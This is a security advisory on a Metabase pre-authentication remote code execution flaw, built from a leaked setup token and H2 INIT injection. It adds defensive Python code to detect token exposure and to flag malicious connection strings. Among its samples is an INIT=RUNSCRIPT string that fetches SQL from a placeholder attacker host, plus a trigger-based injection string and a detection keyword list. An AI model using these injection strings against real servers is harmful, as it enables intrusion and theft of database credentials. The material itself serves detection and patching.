Advisory

Critical Flaw reported in Metabase Business Intelligence

Take action: If you run Metabase, the first and immediate step is to make sure the instance is not reachable from the internet without a VPN or an equivalent authentication layer in front of it, and to confirm that the setup token is no longer served to unauthenticated clients. Then plan the upgrade. Patching a BI system is rarely trivial, because dashboards, drivers and the application database all have to keep working, so test the new release before rolling it out.


Learn More

A critical remote code execution (RCE) vulnerability was discovered in Metabase, a widely used open-source business intelligence tool for building charts and dashboards on top of many databases and data sources. The flaw lets an unauthenticated attacker run arbitrary commands on the server that hosts Metabase.

More than 20,000 instances of Metabase were found exposed to the internet. Because a BI server stores the credentials for, and queries, the large and important databases behind it, an exposed vulnerable instance puts every data source connected to it at risk: whoever compromises Metabase inherits its database access.

The vulnerability revolves around the setup token used during the initial configuration of a Metabase instance. The token is meant to be used once, during first-time setup, and discarded afterwards. On affected versions it was not discarded: it remained readable by unauthenticated users, either embedded in the HTML source of the index/login page or returned by the /api/session/properties endpoint, which answers without authentication.
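A quick way to check your own instances for the exposure described above, as an added example (this is not code from the page or from the Metabase project): it looks for a setup-token value in the JSON that /api/session/properties returns and in the HTML of the index page. The sample response and page source below are constructed to match the shapes the advisory describes, not real captures, and the window.MetabaseBootstrap script-tag name in the HTML sample is an assumption. Only point check_instance at hosts you are authorised to test.

```python
import json
import re
import urllib.request

# Constructed sample of /api/session/properties on an unpatched instance that
# still carries its setup token (not a real capture).
SAMPLE_PROPERTIES_EXPOSED = json.dumps({
    "version": {"tag": "v0.45.3"},
    "setup-token": "a7b0c9f3-1d2e-4f56-8a9b-0c1d2e3f4a5b",
    "has-user-setup": True,
})

# Constructed sample of the same endpoint after the token has been cleared.
SAMPLE_PROPERTIES_CLEAN = json.dumps({
    "version": {"tag": "v0.45.4.1"},
    "setup-token": None,
    "has-user-setup": True,
})

# Constructed index page that embeds bootstrap properties in a <script> tag;
# the window.MetabaseBootstrap name is an assumption, not taken from the page.
SAMPLE_INDEX_HTML = """<html><head></head><body>
<script>window.MetabaseBootstrap = {"setup-token":"a7b0c9f3-1d2e-4f56-8a9b-0c1d2e3f4a5b","version":{"tag":"v0.45.3"}};</script>
</body></html>"""

UUID_RE = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"


def token_from_properties(body: str):
    """Return the setup token if the properties JSON still carries one, else None."""
    try:
        props = json.loads(body)
    except json.JSONDecodeError:
        return None
    if not isinstance(props, dict):
        return None
    token = props.get("setup-token")
    return token if isinstance(token, str) and token else None


def token_from_html(html: str):
    """Return a setup token leaked in the page source, else None."""
    m = re.search(r'"setup-token"\s*:\s*"(' + UUID_RE + r')"', html)
    return m.group(1) if m else None


def is_setup_token_exposed(properties_body: str, index_html: str = "") -> bool:
    """True if either unauthenticated surface still reveals the setup token."""
    return (token_from_properties(properties_body) is not None
            or token_from_html(index_html) is not None)


def fetch(url: str, timeout: int = 10) -> str:
    req = urllib.request.Request(url, headers={"User-Agent": "metabase-setup-token-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def check_instance(base_url: str) -> dict:
    """Query a live instance without credentials. Run only against hosts you own."""
    base = base_url.rstrip("/")
    props = fetch(base + "/api/session/properties")
    html = fetch(base + "/")
    return {
        "token_in_properties": token_from_properties(props),
        "token_in_html": token_from_html(html),
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        print(json.dumps(check_instance(sys.argv[1]), indent=2))
    else:
        print("exposed (constructed sample):",
              is_setup_token_exposed(SAMPLE_PROPERTIES_EXPOSED, SAMPLE_INDEX_HTML))
```

A non-null setup-token in either place on an instance that has already completed setup is the condition to act on; run the check again after the upgrade to confirm the value is gone.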

With the setup token in hand, the researchers could drive the setup-phase API as if first-time configuration were still in progress, and that is what made pre-auth RCE possible. The second ingredient is the H2 database driver bundled with Metabase. An H2 JDBC connection string can carry an INIT parameter, an SQL statement that the driver executes every time the connection is opened. Because the setup flow accepts an attacker-supplied connection string and opens it to validate it, the INIT clause is an SQL injection point, and H2's SQL dialect includes statements that execute code on the host. That injection is what gives the attacker command execution and unauthorised access.

By chaining the leaked token with the INIT injection, the researchers obtained a reverse shell on the Metabase host, that is, interactive remote access from which the stored credentials for, and the data in, every connected data source can be extracted.
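Whether you are writing a rule for a WAF or reverse proxy in front of Metabase, or reviewing data-source definitions that were submitted before the patch went in, the indicator is an H2 connection string carrying an INIT clause. The following is an added example (my code, not the project's): it splits an H2 JDBC URL into its ;KEY=VALUE settings, honouring H2's `\;` escape for a semicolon inside a value, and returns the reasons a string should be rejected or alerted on. The sample strings are constructed, and attacker.example is a placeholder host. The keyword list goes a little beyond the text: besides flagging any INIT clause it also names the H2 statements (RUNSCRIPT, CREATE TRIGGER, CREATE ALIAS with $$ source blocks) that let such a statement reach the host.

```python
import re
from urllib.parse import unquote

# Constructed sample connection strings (not real captures). The first is the
# kind of H2 URL a legitimate local data source would use; the rest carry an
# INIT clause of increasing seriousness. attacker.example is a placeholder.
SAMPLE_URLS = {
    "benign": "jdbc:h2:file:/opt/metabase/sample-dataset.db;IFEXISTS=TRUE",
    "init_plain": "jdbc:h2:mem:probe;INIT=CREATE TABLE t(id INT)",
    "init_multi": r"jdbc:h2:mem:probe;INIT=CREATE TABLE t(id INT)\;INSERT INTO t VALUES(1)",
    "init_encoded": "jdbc:h2:mem:probe;INIT=RUNSCRIPT%20FROM%20'http://attacker.example/x.sql'",
    "init_trigger": "jdbc:h2:mem:probe;INIT=CREATE TRIGGER s BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ source $$",
}

# H2 SQL features that let an INIT statement reach the host: RUNSCRIPT reads a
# file or URL, CREATE TRIGGER / CREATE ALIAS accept source code between $$ markers.
HOST_REACHING_KEYWORDS = ("RUNSCRIPT", "CREATE TRIGGER", "CREATE ALIAS", "$$")


def is_h2_url(jdbc_url: str) -> bool:
    return jdbc_url.lower().startswith("jdbc:h2:")


def parse_h2_settings(jdbc_url: str) -> dict:
    """Return the ;KEY=VALUE settings of an H2 JDBC URL with keys upper-cased.

    A literal ';' inside a value is written '\\;' in H2, so only unescaped
    semicolons separate settings. Percent-decoding is applied first because
    strings recovered from proxy logs are usually URL-encoded.
    """
    if not is_h2_url(jdbc_url):
        raise ValueError("not an H2 JDBC URL")
    parts = re.split(r"(?<!\\);", unquote(jdbc_url))
    settings = {}
    for part in parts[1:]:  # parts[0] is jdbc:h2:<database path>
        if "=" in part:
            key, value = part.split("=", 1)
            settings[key.strip().upper()] = value.strip()
    return settings


def init_statements(init_value: str) -> list:
    """Split an INIT value into its individual statements on the '\\;' escape."""
    return [s for s in re.split(r"\\;", init_value) if s.strip()]


def classify_h2_url(jdbc_url: str) -> list:
    """Reasons to reject or alert on this connection string; empty means none found."""
    if not is_h2_url(jdbc_url):
        return []  # INIT is an H2-specific setting; other drivers are out of scope here
    init = parse_h2_settings(jdbc_url).get("INIT")
    if init is None:
        return []
    reasons = ["INIT clause present: H2 runs it as SQL on every connect"]
    stmts = init_statements(init)
    if len(stmts) > 1:
        reasons.append(f"INIT chains {len(stmts)} statements")
    upper = init.upper()
    for kw in HOST_REACHING_KEYWORDS:
        if kw in upper:
            reasons.append(f"INIT uses {kw}")
    return reasons


if __name__ == "__main__":
    for name, url in SAMPLE_URLS.items():
        print(f"{name:13s} -> {classify_h2_url(url) or 'ok'}")
```

A data-source definition has no legitimate need for INIT, so the first reason alone is enough to block the request; the remaining reasons exist to prioritise the alert, since a chained or RUNSCRIPT/trigger-bearing INIT is an exploitation attempt rather than a probe.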

The fix was shipped as a point release on each supported branch (0.x is the open-source build, 1.x the Enterprise build); any release older than the fixed version for its branch is vulnerable:

  • v0.46.6.1 and v1.46.6.1,
  • v0.45.4.1 and v1.45.4.1,
  • v0.44.7.1 and v1.44.7.1,
  • v0.43.7.2 and v1.43.7.2.

The Metabase development team released these patches to address the vulnerability and strongly advises all users to upgrade to the latest version of their branch to guard against exploitation.
